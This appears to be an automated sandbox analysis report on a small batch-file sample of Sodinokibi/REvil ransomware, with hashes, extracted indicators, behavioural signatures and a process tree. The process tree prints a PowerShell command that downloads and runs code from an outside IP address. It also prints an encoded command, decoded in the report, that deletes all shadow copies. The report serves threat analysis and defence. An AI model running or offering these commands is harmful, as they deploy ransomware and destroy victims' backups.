Analysis
max time kernel: 138s
max time network: 35s
platform: windows7_x64
resource: win7v200430
submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: 1f7cfad9c19adfc78abd3241e8f95952.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 1f7cfad9c19adfc78abd3241e8f95952.bat
  Resource: win10v200430
General
Target: 1f7cfad9c19adfc78abd3241e8f95952.bat
Size: 221B
MD5: a53b25ea0b566a9f0420007a3d2244af
SHA1: eea1e4d5fa16beec4e8cc02e0310345271825017
SHA256: 91ab18506b352621e098b6e9f0466b7d7b89cd8c70219f71e31d1c689889433b
SHA512: 1afaad2d92aeee642b9a0802f772b18682942d48fd12eb3f1bf8a30afb3d34a6cf29f05b31c6ea4b12f1d9a1c30e3687ff5eb03b6abb58da8cf0d93d1c106b9e
Malware Config
Extracted: http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952
Extracted: C:\xf62y6e8oc-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84386979D1DC97D2
  http://decryptor.cc/84386979D1DC97D2
Signatures

Blacklisted process makes network request (1 IoCs)
Processes: powershell.exe
  flow 1, pid 1600, process powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a9ojeds5hau.bmp" (powershell.exe)

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  PID 240 wrote to memory of 1600: cmd.exe -> powershell.exe
  PID 1600 wrote to memory of 1216: powershell.exe -> powershell.exe
  PID 1600 wrote to memory of 1216: powershell.exe -> powershell.exe
  PID 1600 wrote to memory of 1216: powershell.exe -> powershell.exe
  PID 1600 wrote to memory of 1216: powershell.exe -> powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  Token: SeDebugPrivilege, pid 1600, powershell.exe
  Token: SeDebugPrivilege, pid 1600, powershell.exe
  Token: SeDebugPrivilege, pid 1216, powershell.exe
  Token: SeBackupPrivilege, pid 1584, vssvc.exe
  Token: SeRestorePrivilege, pid 1584, vssvc.exe
  Token: SeAuditPrivilege, pid 1584, vssvc.exe
  Token: SeTakeOwnershipPrivilege, pid 1600, powershell.exe

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes:
powershell.exepowershell.exepid process 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1216 powershell.exe 1216 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe -
Drops file in Program Files directory (36 IoCs)
Processes: powershell.exe
  File opened for modification: \??\c:\program files\PopCompress.wax (powershell.exe)
  File opened for modification: \??\c:\program files\TestDeny.wvx (powershell.exe)
  File opened for modification: \??\c:\program files\UnregisterStop.potx (powershell.exe)
  File opened for modification: \??\c:\program files\CompleteSave.vssm (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\xf62y6e8oc-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\RestartSplit.aiff (powershell.exe)
  File opened for modification: \??\c:\program files\StartWatch.asf (powershell.exe)
  File opened for modification: \??\c:\program files\ProtectEdit.jfif (powershell.exe)
  File opened for modification: \??\c:\program files\ResetStep.htm (powershell.exe)
  File opened for modification: \??\c:\program files\ConvertToExpand.html (powershell.exe)
  File opened for modification: \??\c:\program files\FormatReset.css (powershell.exe)
  File opened for modification: \??\c:\program files\GroupAssert.ram (powershell.exe)
  File opened for modification: \??\c:\program files\HideSwitch.mov (powershell.exe)
  File opened for modification: \??\c:\program files\ReceiveUnpublish.M2T (powershell.exe)
  File opened for modification: \??\c:\program files\CompleteRemove.wma (powershell.exe)
  File opened for modification: \??\c:\program files\JoinEdit.html (powershell.exe)
  File opened for modification: \??\c:\program files\OutDisable.3gp (powershell.exe)
  File opened for modification: \??\c:\program files\PublishMerge.dwg (powershell.exe)
  File created: \??\c:\program files\xf62y6e8oc-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\ReadWatch.tmp (powershell.exe)
  File opened for modification: \??\c:\program files\SplitBackup.js (powershell.exe)
  File opened for modification: \??\c:\program files\SuspendCompare.zip (powershell.exe)
  File created: \??\c:\program files (x86)\xf62y6e8oc-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\SubmitDismount.jtx (powershell.exe)
  File opened for modification: \??\c:\program files\UnprotectMeasure.xls (powershell.exe)
  File opened for modification: \??\c:\program files\UseRename.cr2 (powershell.exe)
  File opened for modification: \??\c:\program files\UnblockComplete.tif (powershell.exe)
  File opened for modification: \??\c:\program files\UninstallStart.nfo (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\xf62y6e8oc-readme.txt (powershell.exe)
  File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\xf62y6e8oc-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\ConnectPush.wmv (powershell.exe)
  File opened for modification: \??\c:\program files\ImportUpdate.ADT (powershell.exe)
  File opened for modification: \??\c:\program files\MountDebug.001 (powershell.exe)
  File opened for modification: \??\c:\program files\ReceiveGroup.wmf (powershell.exe)
  File opened for modification: \??\c:\program files\ExpandResume.wmf (powershell.exe)
  File opened for modification: \??\c:\program files\UninstallSync.vst (powershell.exe)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
  pid 1600, process powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\1f7cfad9c19adfc78abd3241e8f95952.bat"
  PID: 240
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952');Invoke-QYITNGKHOZRLOK;Start-Sleep -s 10000"
    PID: 1600
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , which is what triggers the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege token use recorded above)
      PID: 1216
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1584
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken